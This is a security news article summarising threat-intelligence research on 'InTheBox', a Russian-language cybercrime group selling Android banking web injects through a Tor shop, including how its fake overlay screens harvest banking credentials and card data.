Global Banking Apps Under Attack: Researchers Find ‘InTheBox’ Web Injects

A Russian threat actor has been growing stock on a Tor-based online store with web injects that are ready to sell and work with different Android banking malware, researchers found.

They are offering these web injects at low prices and attractive discounts. Cyble Research and Intelligence Labs (CRIL) discovered an uprising threat group from Russian hacking forums, explicitly targeting banking applications.

The research team has been closely monitoring the actions of a notorious threat actor/group known as “InTheBox”.  

Lurking in the shadows of a Russian language cybercrime forum, this group has expanded its reach with a sinister arsenal of web injects. Housed in their Tor-based online shop, these ready-to-use web injects can be paired with various Android banking malware and are offered at bargain prices with alluring discounts. 

What is ‘InTheBox’? 

InTheBox” is a known threat actor or group in the cybercrime community. According to the CRIL report, these groups are primarily active on a Russian language cybercrime forum and are known for offering web injects for sale through their Tor-based online shop. 

This web inject is designed to target retail banking, mobile payment services, cryptocurrency exchanges, and mobile e-commerce applications of major organizations across various countries.  

Since February 2020, the infamous group “InTheBox” has made a name for itself as a verified seller of Android mobile application web injects.  

The group runs a Tor-based online shop that offers a seamless shopping experience for those seeking to purchase web injects. With enticing discounts and an effortless purchasing process, it’s no wonder that “InTheBox” has become popular among those looking to inflict harm on the digital world. 

While earlier gaining access to the tor website was by simply registering for free, now “InTheBox” has upped the ante, requiring a one-time fee for entry. Despite the added barrier, it’s clear that “InTheBox” remains a dangerous force to be reckoned with in the world of cybercrime. 

How Android web injection work? 

 Android web inject is a custom-made module crafted to harvest sensitive information and is the perfect disguise for banking malware.  Victims are lured into a false sense of security with a deceptive overlay interface mimicking a legitimate mobile application.

The web injects acts like a sly thief, silently slipping into the shadows and snatching away valuable credentials and sensitive data.  This attack vector is reminiscent of the age-old Man-in-the-Browser (MITB) attack, a constant threat to those who roam the digital landscape.” 

“InTheBox” has taken the cybercrime world by storm, shaking up the market with their newly reduced prices on individual web injects. What was once a costly investment of $50 can now be had for a mere $30. And for those looking for a truly personalized touch, “InTheBox” offers custom web injection development, tailoring their deadly wares to fit the specific needs of any banking malware bot. 

Starting with a targeted assault on organizations in the US, Australia, and South America, “InTheBox” has broadened its scope, now casting its net over 44 countries. Their relentless pursuit of power and profit knows no bounds, making them a force to be reckoned with in the digital world. 

The web injection, disguised as a benign overlay interface, coaxes unsuspecting users into entering their precious mobile banking credentials, such as user ID, password, and mobile number. However, this is just the tip of the iceberg, as the real damage is yet to come. 

A second overlay interface pops up, tricking the user into handing over their credit card information, including the number, expiry date, and CVV code – information that may not even be necessary for the legitimate app.